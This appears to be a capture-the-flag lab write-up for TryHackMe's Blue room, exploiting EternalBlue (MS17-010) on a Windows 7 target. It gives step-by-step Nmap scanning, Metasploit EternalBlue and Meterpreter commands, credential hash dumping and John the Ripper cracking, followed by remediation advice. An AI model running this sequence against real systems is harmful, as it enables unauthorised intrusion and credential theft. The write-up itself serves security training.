Share
## https://sploitus.com/exploit?id=66C876E9-6FE0-54C3-82A9-818A6802C4C9
[01-EternalBlue-MS17-010-README.md](https://github.com/user-attachments/files/27867170/01-EternalBlue-MS17-010-README.md)
# ๐Ÿ”ด EternalBlue Exploitation โ€” MS17-010 (CVE-2017-0143)

> Exploiting a critical Windows SMBv1 Remote Code Execution vulnerability using Nmap and Metasploit on TryHackMe's Blue room.

![Platform](https://img.shields.io/badge/Platform-TryHackMe-212C42?style=for-the-badge&logo=tryhackme&logoColor=white)
![OS](https://img.shields.io/badge/Target-Windows%207%20SP1-0078D4?style=for-the-badge&logo=windows&logoColor=white)
![Tool](https://img.shields.io/badge/Tool-Metasploit-E34F26?style=for-the-badge&logo=metasploit&logoColor=white)
![CVE](https://img.shields.io/badge/CVE-2017--0143-critical?style=for-the-badge)
![Status](https://img.shields.io/badge/Status-Completed-00B294?style=for-the-badge)

---

## ๐Ÿ“Œ Project Overview

| Field | Details |
|---|---|
| **Room** | TryHackMe โ€” Blue |
| **Target OS** | Windows 7 Professional SP1 (x64) |
| **Vulnerability** | MS17-010 EternalBlue โ€” SMBv1 RCE |
| **CVE** | CVE-2017-0143 |
| **CVSS Score** | 9.3 (Critical) |
| **Attacker OS** | Kali Linux 2025.1 |
| **Tools** | Nmap, Metasploit, John the Ripper |

---

## ๐ŸŽฏ Objective

Simulate a real-world attack scenario by identifying and exploiting the **EternalBlue (MS17-010)** vulnerability โ€” a critical SMBv1 Remote Code Execution flaw affecting unpatched Windows systems โ€” and demonstrate post-exploitation techniques including privilege escalation, credential dumping, and flag retrieval.

---

## ๐Ÿง  Concepts Covered

- โœ… Network scanning & service enumeration with Nmap
- โœ… SMB vulnerability detection using NSE scripts
- โœ… CVE research using NIST National Vulnerability Database
- โœ… Exploitation using Metasploit Framework (EternalBlue module)
- โœ… Meterpreter shell โ€” post-exploitation commands
- โœ… Credential hash dumping using `hashdump`
- โœ… Password cracking using John the Ripper + rockyou.txt
- โœ… Flag retrieval across filesystem locations

---

## ๐Ÿ› ๏ธ Tools & Technologies

![Kali Linux](https://img.shields.io/badge/Kali%20Linux-557C94?style=flat-square&logo=kalilinux&logoColor=white)
![Nmap](https://img.shields.io/badge/Nmap-0E83CD?style=flat-square&logo=nmap&logoColor=white)
![Metasploit](https://img.shields.io/badge/Metasploit-E34F26?style=flat-square&logoColor=white)
![John the Ripper](https://img.shields.io/badge/John%20the%20Ripper-black?style=flat-square)
![OpenVPN](https://img.shields.io/badge/OpenVPN-EA7E20?style=flat-square&logo=openvpn&logoColor=white)
![TryHackMe](https://img.shields.io/badge/TryHackMe-212C42?style=flat-square&logo=tryhackme&logoColor=white)

---

## ๐Ÿ—๏ธ Lab Architecture

```
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚                      LAB ENVIRONMENT                        โ”‚
โ”‚                                                             โ”‚
โ”‚  ATTACKER (Kali Linux)           TARGET (Windows 7 SP1)     โ”‚
โ”‚  โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€           โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ โ”‚
โ”‚  IP: 192.168.217.209             IP: 10.49.130.67           โ”‚
โ”‚  Metasploit Framework            Port 445 โ€” SMBv1 OPEN      โ”‚
โ”‚  John the Ripper                 CVE-2017-0143 VULNERABLE   โ”‚
โ”‚                                                             โ”‚
โ”‚  Connection via: TryHackMe OpenVPN Tunnel                   โ”‚
โ”‚  Tunnel IP: tun0 โ€” 192.168.217.209/17                      โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
```

---

## ๐Ÿ“‹ Step-by-Step Walkthrough

### Phase 1 โ€” Environment Setup

**Connect to TryHackMe via OpenVPN:**
```bash
sudo openvpn [filename].ovpn
```

**Verify tunnel IP:**
```bash
ip a
# Look for tun0 interface โ€” this is your attack IP
```

---

### Phase 2 โ€” Reconnaissance & Scanning

**Full service scan on target:**
```bash
sudo nmap 10.49.130.67 -sV -sC -p- --min-rate 1000
```

**Results โ€” Open Ports Discovered:**
```
PORT      STATE  SERVICE        VERSION
135/tcp   open   msrpc          Microsoft Windows RPC
139/tcp   open   netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open   microsoft-ds   Windows 7 Professional SP1
3389/tcp  open   ms-wbt-server  Microsoft Terminal Service
Target: JON-PC | Domain: WORKGROUP
```

---

### Phase 3 โ€” Vulnerability Detection

**Run SMB vulnerability script:**
```bash
sudo nmap --script smb-vuln-ms17-010 --min-rate 1000 10.49.130.67
```

**Result:**
```
smb-vuln-ms17-010:
  VULNERABLE:
  Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
    State: VULNERABLE
    IDs: CVE:CVE-2017-0143
    Risk factor: HIGH
```

> ๐Ÿ”Ž **CVE Research:** Verified on [NIST NVD](https://nvd.nist.gov/vuln/detail/cve-2017-0143) โ€” CVSS Base Score: 9.3 CRITICAL

---

### Phase 4 โ€” Exploitation (Metasploit)

**Launch Metasploit:**
```bash
msfconsole
```

**Search and select EternalBlue module:**
```bash
msf > search eternalblue
msf > use exploit/windows/smb/ms17_010_eternalblue
```

**Configure and run:**
```bash
set RHOSTS 10.49.130.67        # Target IP
set LHOST 192.168.217.209      # Your tun0 IP
exploit
```

**Result:**
```
[+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Meterpreter session 1 opened
meterpreter >
```

---

### Phase 5 โ€” Post-Exploitation

**Upgrade shell to Meterpreter:**
```bash
# Background current session
sessions
use post/multi/manage/shell_to_meterpreter
set SESSION 1
set LHOST 192.168.217.209
exploit
sessions 2
```

**System enumeration:**
```bash
meterpreter > sysinfo
# Computer: JON-PC | OS: Windows 7 SP1 | Arch: x64

meterpreter > shell
C:\Windows\system32> whoami
# nt authority\system   โ† Full SYSTEM privileges!
```

**Credential hash dumping:**
```bash
meterpreter > hashdump
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe...
# Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be...
```

**Password cracking:**
```bash
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
# Jon's password cracked successfully
```

---

### Phase 6 โ€” Flag Retrieval

```bash
# Flag 1 โ€” Root of C:\
cd c:\\ && dir
# flag1.txt found

# Flag 2 โ€” Windows System32 config
search -f flag2.txt
# c:\Windows\System32\config\flag2.txt

# Flag 3 โ€” User Documents
search -f flag3.txt
# c:\Users\Jon\Documents\flag3.txt
```

---

## ๐Ÿ“Š Results Summary

| Phase | Action | Outcome |
|---|---|---|
| Recon | Nmap full scan | 4 open ports identified |
| Vuln Scan | smb-vuln-ms17-010 NSE | VULNERABLE confirmed |
| Exploitation | EternalBlue module | Meterpreter shell obtained |
| Privilege | whoami check | NT AUTHORITY\SYSTEM |
| Creds | hashdump | 3 hashes extracted |
| Cracking | John + rockyou | Password cracked |
| Flags | search -f | All 3 flags retrieved โœ… |

---

## ๐Ÿ›ก๏ธ Remediation Recommendations

| Vulnerability | Fix |
|---|---|
| SMBv1 Enabled | Disable SMBv1 via PowerShell: `Set-SmbServerConfiguration -EnableSMB1Protocol $false` |
| MS17-010 Unpatched | Apply Microsoft Security Bulletin MS17-010 |
| Weak Passwords | Enforce password complexity policies |
| No Network Segmentation | Isolate SMB traffic with firewall rules โ€” block port 445 externally |
| No EDR/AV | Deploy endpoint detection to flag Metasploit payloads |

---

## ๐Ÿ”‘ Key Takeaways

1. **Unpatched SMBv1 is catastrophic** โ€” EternalBlue was used in WannaCry & NotPetya ransomware attacks
2. **Nmap NSE scripts** are powerful for rapid CVE-specific detection
3. **Always start with Report-Only scanning** before active exploitation in real engagements
4. **SYSTEM-level access** via a single exploit underscores the importance of network patching
5. **Password hygiene matters** โ€” weak NT hashes crack in seconds with rockyou.txt

---

## ๐Ÿ“š References

- [CVE-2017-0143 โ€” NVD NIST](https://nvd.nist.gov/vuln/detail/cve-2017-0143)
- [TryHackMe โ€” Blue Room](https://tryhackme.com/r/room/blue)
- [MS17-010 Microsoft Security Bulletin](https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010)
- [Metasploit EternalBlue Module](https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/)

---

## ๐Ÿ‘ค Author

**Badugu Gowtham Adhitya** | IAM Engineer & Cloud Security Engineer

[![LinkedIn](https://img.shields.io/badge/LinkedIn-gowtham--adhitya-0A66C2?style=flat-square&logo=linkedin)](https://www.linkedin.com/in/gowtham-adhitya-0a403b190)
[![GitHub](https://img.shields.io/badge/GitHub-gowthamadhitya-181717?style=flat-square&logo=github)](https://github.com/gowthamadhitya)

> โš ๏ธ **Disclaimer:** This project was performed in a legal, controlled lab environment (TryHackMe). All techniques demonstrated are for educational purposes only.